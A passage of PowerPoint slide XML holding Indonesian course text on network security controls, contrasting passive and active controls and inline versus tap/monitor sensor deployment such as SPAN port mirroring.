              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memerlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>agen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> transfer data host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beroperasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diarahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disalin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sensor dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sepenuhnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Host di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyadari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beroperasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dialamatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertukar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host target. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemfilteran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksplisit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menginstal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>agen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada host, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> gateway.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Sebaris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> versus Ketuk/Monitor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebaris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jalur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Tidak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>topologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perutean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> MAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>opsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> inline versus monitor, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengendus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sensor yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>SPAN (switched port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>analyzer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>)/ port mirror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sensor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>salinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> frame yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditujukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
